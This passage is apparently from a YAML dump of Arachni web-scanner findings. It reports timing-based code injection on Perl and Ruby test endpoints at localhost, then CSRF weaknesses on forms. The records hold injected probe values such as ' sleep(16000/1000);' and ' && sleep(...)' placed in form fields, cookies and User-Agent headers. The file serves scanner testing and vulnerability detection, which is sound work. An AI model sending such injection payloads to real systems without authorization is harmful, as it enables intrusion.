' sleep(16000/1000);' id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/perl/link/straight?input=default elem: link method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' sleep(16000/1000);' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :follow_location: true :injected: ! ' sleep(16000/1000);' :combo: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :action: http://localhost:14309/perl/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:14309/perl/link/straight?input=default injected: ! 
' sleep(16000/1000);' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:14309/perl/cookie/straight elem: cookie method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' sleep(16000/1000);' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ' sleep(16000/1000);' :injected: ! ' sleep(16000/1000);' :combo: !binary "Y29va2ll": ! ' sleep(16000/1000);' :action: http://localhost:14309/perl/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:14309/perl/cookie/straight injected: ! 
' sleep(16000/1000);' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=++sleep(16000/1000)%3B response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:14309/perl/header/straight elem: header method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' && sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' && sleep(16000/1000);' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! ' && sleep(16000/1000);' :injected: ! ' && sleep(16000/1000);' :combo: User-Agent: ! ' && sleep(16000/1000);' :action: http://localhost:14309/perl/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:14309/perl/header/straight injected: ! ' && sleep(16000/1000);' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! 
' && sleep(16000/1000);' Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/ruby/form/straight elem: form method: POST name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' sleep(16000/1000);' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :follow_location: true :injected: ! ' sleep(16000/1000);' :combo: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :action: http://localhost:14309/ruby/form/straight :silent: true :regexp: '' var: input url: http://localhost:14309/ruby/form/straight injected: ! 
' sleep(16000/1000);' id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:14309/ruby/link/straight?input=default elem: link method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' sleep(16000/1000);' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :follow_location: true :injected: ! ' sleep(16000/1000);' :combo: !binary "aW5wdXQ=": ! ' sleep(16000/1000);' :action: http://localhost:14309/ruby/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:14309/ruby/link/straight?input=default injected: ! 
' sleep(16000/1000);' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:14309/ruby/cookie/straight elem: cookie method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' sleep(16000/1000);' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ' sleep(16000/1000);' :injected: ! ' sleep(16000/1000);' :combo: !binary "Y29va2ll": ! ' sleep(16000/1000);' :action: http://localhost:14309/ruby/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:14309/ruby/cookie/straight injected: ! 
' sleep(16000/1000);' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=++sleep(16000/1000)%3B response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:14309/ruby/header/straight elem: header method: GET name: Code injection (timing attack) description: ! 
"Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 11200.0 :timeout_divider: 1 :timing_string: ! ' && sleep(__TIME__/1000);' :skip_orig: true :injected_orig: ! ' && sleep(16000/1000);' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! ' && sleep(16000/1000);' :injected: ! ' && sleep(16000/1000);' :combo: User-Agent: ! ' && sleep(16000/1000);' :action: http://localhost:14309/ruby/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:14309/ruby/header/straight injected: ! ' && sleep(16000/1000);' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! 
' && sleep(16000/1000);' Cookie: cookie=cookie+value response: {} name: Code injection (timing attack) description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - code - injection - timing - blind cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection (timing) variations: [] internal_modname: CodeInjectionTiming internal_modname: CodeInjectionTiming - !ruby/object:Arachni::Issue verification: false references: Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) CGI Security: http://www.cgisecurity.com/csrf-faq.html var: insecure_important_form url: http://localhost:9097/ elem: form method: GET name: Cross-Site Request Forgery description: ! "The web application does not, or can not,\n sufficiently verify whether a well-formed, valid, consistent\n request was intentionally provided by the user who submitted the request.\n This is due to a lack of secure anti-CSRF tokens to verify\n the freshness of the submitted data." tags: - csrf - rdiff - form - token cwe: '352' cwe_url: http://cwe.mitre.org/data/definitions/352.html severity: High remedy_guidance: ! "A unique token that guarantees freshness of submitted\n data must be added to all web application elements that can affect\n business logic." 
mod_name: CSRF variations: - !ruby/object:Arachni::Issue verification: false references: Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) CGI Security: http://www.cgisecurity.com/csrf-faq.html opts: :var: !binary |- aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0= :elem: form :regexp: '' var: insecure_important_form url: http://localhost:9097/ injected: id: regexp: '' regexp_match: elem: form remarks: {} method: GET response: ! "
\n \n
\n
\n \ \n
\n\n \
\n \n \n
\n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: logged_in=true response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDYz !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Cross-Site Request Forgery description: ! "The web application does not, or can not,\n sufficiently verify whether a well-formed, valid, consistent\n request was intentionally provided by the user who submitted the request.\n This is due to a lack of secure anti-CSRF tokens to verify\n the freshness of the submitted data." tags: - csrf - rdiff - form - token cwe: '352' cwe_url: http://cwe.mitre.org/data/definitions/352.html severity: High remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data must be added to all web application elements that can affect\n business logic." mod_name: CSRF variations: [] internal_modname: CSRF internal_modname: CSRF - !ruby/object:Arachni::Issue verification: false references: Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) CGI Security: http://www.cgisecurity.com/csrf-faq.html var: insecure_important_form url: http://localhost:9097/token_in_name elem: form method: GET name: Cross-Site Request Forgery description: ! 
"The web application does not, or can not,\n sufficiently verify whether a well-formed, valid, consistent\n request was intentionally provided by the user who submitted the request.\n This is due to a lack of secure anti-CSRF tokens to verify\n the freshness of the submitted data." tags: - csrf - rdiff - form - token cwe: '352' cwe_url: http://cwe.mitre.org/data/definitions/352.html severity: High remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data must be added to all web application elements that can affect\n business logic." mod_name: CSRF variations: - !ruby/object:Arachni::Issue verification: false references: Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) CGI Security: http://www.cgisecurity.com/csrf-faq.html opts: :var: !binary |- aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0= :elem: form :regexp: '' var: insecure_important_form url: http://localhost:9097/token_in_name injected: id: regexp: '' regexp_match: elem: form remarks: {} method: GET response: ! "
\n \n
\n
\n \ \n
\n\n \
\n \n \n
\n\n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: logged_in=true response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDQy !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Cross-Site Request Forgery description: ! "The web application does not, or can not,\n sufficiently verify whether a well-formed, valid, consistent\n request was intentionally provided by the user who submitted the request.\n This is due to a lack of secure anti-CSRF tokens to verify\n the freshness of the submitted data." tags: - csrf - rdiff - form - token cwe: '352' cwe_url: http://cwe.mitre.org/data/definitions/352.html severity: High remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data must be added to all web application elements that can affect\n business logic." mod_name: CSRF variations: [] internal_modname: CSRF internal_modname: CSRF - !ruby/object:Arachni::Issue verification: false references: Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) CGI Security: http://www.cgisecurity.com/csrf-faq.html var: insecure_important_form url: http://localhost:9097/token_in_action elem: form method: GET name: Cross-Site Request Forgery description: ! 
"The web application does not, or can not,\n sufficiently verify whether a well-formed, valid, consistent\n request was intentionally provided by the user who submitted the request.\n This is due to a lack of secure anti-CSRF tokens to verify\n the freshness of the submitted data." tags: - csrf - rdiff - form - token cwe: '352' cwe_url: http://cwe.mitre.org/data/definitions/352.html severity: High remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data must be added to all web application elements that can affect\n business logic." mod_name: CSRF variations: - !ruby/object:Arachni::Issue verification: false references: Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) CGI Security: http://www.cgisecurity.com/csrf-faq.html opts: :var: !binary |- aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0= :elem: form :regexp: '' var: insecure_important_form url: http://localhost:9097/token_in_action injected: id: regexp: '' regexp_match: elem: form remarks: {} method: GET response: ! "
\n \n
\n
\n \ \n
\n\n \
\n \ \n
\n\n \
\n \ \n
\n\n \
\n \ \n
\n\n" headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: logged_in=true response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY2 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Cross-Site Request Forgery description: ! "The web application does not, or can not,\n sufficiently verify whether a well-formed, valid, consistent\n request was intentionally provided by the user who submitted the request.\n This is due to a lack of secure anti-CSRF tokens to verify\n the freshness of the submitted data." tags: - csrf - rdiff - form - token cwe: '352' cwe_url: http://cwe.mitre.org/data/definitions/352.html severity: High remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data must be added to all web application elements that can affect\n business logic." mod_name: CSRF variations: [] internal_modname: CSRF internal_modname: CSRF - !ruby/object:Arachni::Issue verification: false references: Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) CGI Security: http://www.cgisecurity.com/csrf-faq.html var: insecure_important_form url: http://localhost:9097/with_nonce elem: form method: GET name: Cross-Site Request Forgery description: ! 
"The web application does not, or can not,\n sufficiently verify whether a well-formed, valid, consistent\n request was intentionally provided by the user who submitted the request.\n This is due to a lack of secure anti-CSRF tokens to verify\n the freshness of the submitted data." tags: - csrf - rdiff - form - token cwe: '352' cwe_url: http://cwe.mitre.org/data/definitions/352.html severity: High remedy_guidance: ! "A unique token that guaranties freshness of submitted\n data must be added to all web application elements that can affect\n business logic." mod_name: CSRF variations: - !ruby/object:Arachni::Issue verification: false references: Wikipedia: http://en.wikipedia.org/wiki/Cross-site_request_forgery OWASP: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) CGI Security: http://www.cgisecurity.com/csrf-faq.html opts: :var: !binary |- aW5zZWN1cmVfaW1wb3J0YW50X2Zvcm0= :elem: form :regexp: '' var: insecure_important_form url: http://localhost:9097/with_nonce injected: id: regexp: '' regexp_match: elem: form remarks: {} method: GET response: ! "
\n \n
\n
\n \ \n
\n\n \
\n \n \n
